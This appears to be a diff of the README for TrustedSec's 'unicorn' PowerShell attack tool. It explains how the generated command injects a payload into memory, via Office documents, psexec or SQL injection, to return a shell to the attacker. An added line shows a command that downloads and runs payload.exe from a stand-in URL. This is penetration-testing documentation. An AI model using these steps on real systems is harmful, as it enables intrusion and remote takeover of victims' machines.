trustedsec/unicorn/README.md

 ###                -----POWERSHELL ATTACK INSTRUCTIONS----

 Everything is now generated in two files, powershell_attack.txt and unicorn.rc.
 The text file contains  all of the code needed in order to inject the powershell attack into memory.
 Note you will need a place that supports remote command injection of some sort.
 Often times this could be through an excel/word  doc or through psexec_commands inside of Metasploit, SQLi, etc..
 There are so many implications and  scenarios to where you can use this attack at.
-Simply paste the powershell_attacks.txt command in any command prompt window or where you have the ability to call the powershell executable and it will give a shell back to you.
+Simply paste the powershell_attack.txt command in any command prompt window or where you have the ability to call the powershell executable and it will give a shell back to you.
 This attack also supports windows/download_exec for a payload method instead of just Meterpreter payloads.
+When using the download and exec, simply put python unicorn.py windows/download_exec url=https://www.thisisnotarealsite.com/payload.exe and the powershell code will download the payload and execute.

 Note that you will need to have a listener enabled in order to capture the attack.